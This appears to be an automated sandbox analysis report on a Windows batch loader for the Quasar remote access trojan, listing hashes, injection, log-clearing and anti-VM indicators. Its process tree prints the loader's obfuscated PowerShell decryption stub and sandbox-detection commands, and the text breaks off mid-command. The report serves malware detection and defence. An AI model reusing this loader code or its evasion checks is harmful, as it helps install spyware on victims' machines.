quasar | a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb

Analysis

max time kernel
150s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
04-01-2025 14:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Loader.bat
Size

7.3MB
MD5

1bec1098946595a03fa067a3ef7ce292
SHA1

89cfb4a2f8800f1b944d906d959639907672317d
SHA256

a8f184a333fb89f41ddca323472463b4ee2cbed63d26d105823300148e2015cb
SHA512

dc7e73ed353d50b73a0eb6f1d955812a29fc5e05df300487d1eda49cc78e6748929a17cd59b58148f7e8696fd0fdfd21e8269af6788f1037bda6d8ddf30c6082
SSDEEP

49152:262lW3ZtqF71E0f+DP24xmB1F+RfHhZzvTUPbFJMg0FQ5/Ai4cr5YSW7iFsihJv1:k

Score

10^/10

quasar defense_evasion execution spyware trojan

Malware Config

Extracted

Family

quasar

Attributes

encryption_key
6F38862AF940DB0B877E1A5C024641D617D7FAB6
reconnect_delay
3000

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/1664-2111-0x00000250D2CE0000-0x00000250D3464000-memory.dmp	family_quasar

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 2836 created 1708	2836	WerFault.exe	83
PID 4644 created 1664	4644	WerFault.exe	98

Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs

description	pid	Process	procid_target
PID 1708 created 632	1708	powershell.exe	5
PID 3352 created 1708	3352	svchost.exe	83
PID 1664 created 632	1664	powershell.exe	5
PID 3352 created 1664	3352	svchost.exe	98
PID 3352 created 1664	3352	svchost.exe	98

Blocklisted process makes network request 25 IoCs

flow	pid	Process
2	1664	powershell.exe
4	1664	powershell.exe
5	1664	powershell.exe
6	1664	powershell.exe
7	1664	powershell.exe
8	1664	powershell.exe
9	1664	powershell.exe
10	1664	powershell.exe
11	1664	powershell.exe
12	1664	powershell.exe
13	1664	powershell.exe
15	1664	powershell.exe
16	1664	powershell.exe
17	1664	powershell.exe
18	1664	powershell.exe
19	1664	powershell.exe
20	1664	powershell.exe
21	1664	powershell.exe
22	1664	powershell.exe
23	1664	powershell.exe
24	1664	powershell.exe
25	1664	powershell.exe
26	1664	powershell.exe
27	1664	powershell.exe
28	1664	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1708	powershell.exe
1664	powershell.exe

Deletes itself 1 IoCs

pid	Process
1708	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2752	tSVFjN.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\$nya-abOpwypC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 22 IoCs

pid	Process
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1708 set thread context of 3912	1708	powershell.exe	84
PID 1664 set thread context of 3328	1664	powershell.exe	99

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	powershell.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$rbx-onimai2	powershell.exe
File created	C:\Windows\$rbx-onimai2\$rbx-CO2.bat	cmd.exe
File opened for modification	C:\Windows\$nya-onimai2	powershell.exe
File created	C:\Windows\$nya-onimai2\tSVFjN.exe	powershell.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe

Checks processor information in registry 2 TTPs 14 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 14 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sat, 04 Jan 2025 14:41:44 GMT"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1736001703"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5A091BB4-FAA7-4CAE-B669-38E63115A55C}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1708	powershell.exe
1708	powershell.exe
1708	powershell.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe
3912	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3284	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	3912	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe
Token: SeSecurityPrivilege	2740	svchost.exe
Token: SeTakeOwnershipPrivilege	2740	svchost.exe
Token: SeLoadDriverPrivilege	2740	svchost.exe
Token: SeSystemtimePrivilege	2740	svchost.exe
Token: SeBackupPrivilege	2740	svchost.exe
Token: SeRestorePrivilege	2740	svchost.exe
Token: SeShutdownPrivilege	2740	svchost.exe
Token: SeSystemEnvironmentPrivilege	2740	svchost.exe
Token: SeUndockPrivilege	2740	svchost.exe
Token: SeManageVolumePrivilege	2740	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2740	svchost.exe
Token: SeIncreaseQuotaPrivilege	2740	svchost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1664	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3872 wrote to memory of 3880	3872	cmd.exe	78
PID 3872 wrote to memory of 3880	3872	cmd.exe	78
PID 3872 wrote to memory of 2832	3872	cmd.exe	79
PID 3872 wrote to memory of 2832	3872	cmd.exe	79
PID 3872 wrote to memory of 4600	3872	cmd.exe	80
PID 3872 wrote to memory of 4600	3872	cmd.exe	80
PID 3872 wrote to memory of 1512	3872	cmd.exe	81
PID 3872 wrote to memory of 1512	3872	cmd.exe	81
PID 3872 wrote to memory of 1652	3872	cmd.exe	82
PID 3872 wrote to memory of 1652	3872	cmd.exe	82
PID 3872 wrote to memory of 1708	3872	cmd.exe	83
PID 3872 wrote to memory of 1708	3872	cmd.exe	83
PID 1708 wrote to memory of 3912	1708	powershell.exe	84
PID 1708 wrote to memory of 3912	1708	powershell.exe	84
PID 1708 wrote to memory of 3912	1708	powershell.exe	84
PID 1708 wrote to memory of 3912	1708	powershell.exe	84
PID 1708 wrote to memory of 3912	1708	powershell.exe	84
PID 1708 wrote to memory of 3912	1708	powershell.exe	84
PID 1708 wrote to memory of 3912	1708	powershell.exe	84
PID 1708 wrote to memory of 3912	1708	powershell.exe	84
PID 3912 wrote to memory of 632	3912	dllhost.exe	5
PID 3912 wrote to memory of 684	3912	dllhost.exe	7
PID 3912 wrote to memory of 988	3912	dllhost.exe	12
PID 3912 wrote to memory of 424	3912	dllhost.exe	13
PID 3912 wrote to memory of 460	3912	dllhost.exe	14
PID 3912 wrote to memory of 628	3912	dllhost.exe	15
PID 3912 wrote to memory of 1036	3912	dllhost.exe	16
PID 3912 wrote to memory of 1044	3912	dllhost.exe	17
PID 3912 wrote to memory of 1168	3912	dllhost.exe	19
PID 3912 wrote to memory of 1200	3912	dllhost.exe	20
PID 3912 wrote to memory of 1244	3912	dllhost.exe	21
PID 3912 wrote to memory of 1324	3912	dllhost.exe	22
PID 3912 wrote to memory of 1336	3912	dllhost.exe	23
PID 3912 wrote to memory of 1344	3912	dllhost.exe	24
PID 3912 wrote to memory of 1400	3912	dllhost.exe	25
PID 3912 wrote to memory of 1456	3912	dllhost.exe	26
PID 3912 wrote to memory of 1472	3912	dllhost.exe	27
PID 3912 wrote to memory of 1604	3912	dllhost.exe	28
PID 3912 wrote to memory of 1656	3912	dllhost.exe	29
PID 3912 wrote to memory of 1724	3912	dllhost.exe	30
PID 3912 wrote to memory of 1796	3912	dllhost.exe	31
PID 3912 wrote to memory of 1852	3912	dllhost.exe	32
PID 3912 wrote to memory of 1872	3912	dllhost.exe	33
PID 3912 wrote to memory of 1880	3912	dllhost.exe	34
PID 3912 wrote to memory of 1984	3912	dllhost.exe	35
PID 3912 wrote to memory of 2044	3912	dllhost.exe	36
PID 3912 wrote to memory of 2076	3912	dllhost.exe	37
PID 3912 wrote to memory of 2264	3912	dllhost.exe	39
PID 3912 wrote to memory of 2316	3912	dllhost.exe	40
PID 3912 wrote to memory of 2544	3912	dllhost.exe	41
PID 3912 wrote to memory of 2552	3912	dllhost.exe	42
PID 3912 wrote to memory of 2596	3912	dllhost.exe	43
PID 3912 wrote to memory of 2632	3912	dllhost.exe	44
PID 3912 wrote to memory of 2664	3912	dllhost.exe	45
PID 3912 wrote to memory of 2684	3912	dllhost.exe	46
PID 3912 wrote to memory of 2728	3912	dllhost.exe	47
PID 3912 wrote to memory of 2740	3912	dllhost.exe	48
PID 3912 wrote to memory of 2764	3912	dllhost.exe	49
PID 3912 wrote to memory of 2792	3912	dllhost.exe	50
PID 3912 wrote to memory of 3120	3912	dllhost.exe	51
PID 3912 wrote to memory of 3284	3912	dllhost.exe	52
PID 3912 wrote to memory of 3440	3912	dllhost.exe	53
PID 3912 wrote to memory of 3460	3912	dllhost.exe	54
PID 3912 wrote to memory of 3892	3912	dllhost.exe	57

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:632
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:424
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c62ffddf-d182-44a2-b6b0-f7328618f04e}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3912
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0558ea34-235b-4e2a-9171-3fe29cd30ffd}
  2⤵
  PID:3328

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:988

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:460

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1168

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1324

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1336

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1400
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1456

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1656

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1852

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1984

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2044

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2076

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2264

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2664

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2684

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2792

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3120

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3872
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4308
- - C:\Windows\system32\fsutil.exe
    fsutil fsinfo drives
    3⤵
    PID:3880
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
    3⤵
    PID:2832
- - C:\Windows\system32\fsutil.exe
    fsutil fsinfo drives
    3⤵
    PID:4600
- - C:\Windows\system32\findstr.exe
    findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
    3⤵
    PID:1512
- - C:\Windows\system32\cmd.exe
    cmd.exe /c echo function orcC($VcbY){ Invoke-Expression -InformationAction Ignore -Debug -WarningAction Inquire -Verbose '$SYoq=QX[QXSyQXsQXtQXeQXmQX.QXSeQXcQXuQXrQXiQXtyQX.CQXryQXptQXoQXgQXrQXapQXhQXyQX.QXAQXeQXsQX]:QX:QXCQXrQXeQXatQXeQX(QX);'.Replace('QX', ''); Invoke-Expression -WarningAction Inquire '$SYoq.SdMSdodSdeSd=Sd[SdSSdySdstSdeSdmSd.SdSSdecSdurSditSdy.SdCSdrSdySdptSdoSdgSdrSdaSdpSdhSdy.SdCSdiSdpSdhSderSdMSdoSddSdeSd]Sd:Sd:SdCSdBSdC;'.Replace('Sd', ''); Invoke-Expression -Verbose '$SYoq.BAPBAadBAdBAiBAnBAgBA=BA[SBAyBAsBAtBAeBAm.BASeBAcuBAriBAtBAyBA.BACrBAyBApBAtBAoBAgBArBAapBAhBAyBA.BAPBAadBAdBAiBAnBAgBAMBAoBAdBAeBA]BA:BA:BAPKBACBASBA7;'.Replace('BA', ''); Invoke-Expression -Verbose '$SYoq.ffKffeyff=ff[ffSffyffsffteffmff.ffCffoffnvfferfft]ff::ffFffrffoffmBffaffsffeff6ff4ffSfftrffiffnffg("ffsffM0ffmffsffDffDffIffoMffhff1ffSffmff09ffPMffedffmlffRff5ffsff8dffKffdffWffvffJff5ffQgffLff0ff/ffkffKTffMffcff=");'.Replace('ff', ''); Invoke-Expression -Verbose '$SYoq.gvIgvV=gv[gvSgvygvsgvtgvemgv.gvCgvogvngvvegvrtgv]:gv:FgvrgvogvmgvBagvsgvegv6gv4gvSgvtgvrigvngvggv("gvYgvqRgvzgvygvygvqgvRgv5VgvugvmgvBgv3gvO1gvovgvK9gvowgv=gv=gv");'.Replace('gv', ''); $HyBY=$SYoq.CreateDecryptor(); $fhiM=$HyBY.TransformFinalBlock($VcbY, 0, $VcbY.Length); $HyBY.Dispose(); $SYoq.Dispose(); $fhiM;}function tHVO($VcbY){ Invoke-Expression -WarningAction Inquire '$amXY=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm(,$VcbY);'.Replace('uL', ''); Invoke-Expression -Debug '$DOPc=uLNuLewuL-uLOuLbuLjuLeuLctuL uLSuLyuLsuLteuLm.uLIOuL.MuLeuLmuLouLryuLSuLtuLruLeuLauLm;'.Replace('uL', ''); Invoke-Expression -InformationAction Ignore '$ZloT=yjNyjewyj-yjOyjbyjjyjeyjctyj yjSyjyyjsyjteyjm.yjIOyj.Cyjoyjmyjpyjreyjsyjsyjiyjoyjnyj.yjGZyjiyjpyjSyjtyjreyjayjm($amXY, 